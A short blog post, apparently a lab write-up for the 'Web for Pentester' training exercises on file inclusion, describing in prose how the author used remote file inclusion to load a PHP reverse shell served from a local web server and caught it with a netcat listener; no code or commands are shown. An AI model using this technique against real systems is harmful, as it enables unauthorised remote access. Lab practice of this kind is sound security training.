Saturday, 30 May 2015

Web for Pentester - File Inclusion

There are two types of File inclusion
Local and Remote

Example 1.

Below is an example of Local File Inclusion, Remote is also an option, however i will cover that in Example 2.

Example 2.

I decided to use a Pentest Monkey`s php reverse shell 

after a quick edit, it was good to go.

I used pythons inbuilt simplehttpserver hosting the script on my machine, and setup a simple netcat listener for it to connect back to.


Remote File Include, a php-reverse-shell which connected back to my netcat listener.

I wont cover escalating, that is for another day.
For now a foothold will suffice  =)

Thanks for reading.

No comments:

Post a Comment